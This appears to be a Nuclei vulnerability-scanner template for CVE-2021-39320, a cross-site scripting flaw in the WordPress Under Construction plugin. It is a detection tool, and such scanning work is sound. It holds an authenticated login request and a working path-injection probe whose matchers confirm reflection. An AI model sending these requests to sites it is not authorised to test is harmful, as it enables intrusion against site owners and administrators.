id: CVE-2021-39320 info: name: WordPress Under Construction <1.19 - Cross-Site Scripting author: dhiyaneshDK severity: medium description: | WordPress Under Construction plugin before 1.19 contains a cross-site scripting vulnerability. The plugin echoes out the raw value of `$GLOBALS['PHP_SELF']` in the ucOptions.php file on certain configurations, including Apache+modPHP. reference: - https://wpscan.com/vulnerability/49ae1df0-d6d2-4cbb-9a9d-bf3599429875 - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39320 - https://nvd.nist.gov/vuln/detail/CVE-2021-39320 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-39320 cwe-id: CWE-79 cpe: cpe:2.3:a:underconstruction_project:underconstruction:*:*:*:*:*:*:*:* epss-score: 0.0021 metadata: max-request: 2 verified: true tags: cve,cve2021,wp-plugin,wpscan,wordpress,wp,xss,authenticated http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - | GET /wp-admin/admin.php/">/?page=under-construction HTTP/1.1 Host: {{Hostname}} cookie-reuse: true matchers-condition: and matchers: - type: word part: body words: - 'action="/wp-admin/admin.php/">' - 'under-construction' condition: and - type: word part: header words: - "text/html" - type: status status: - 200 # Enhanced by mp on 2022/09/28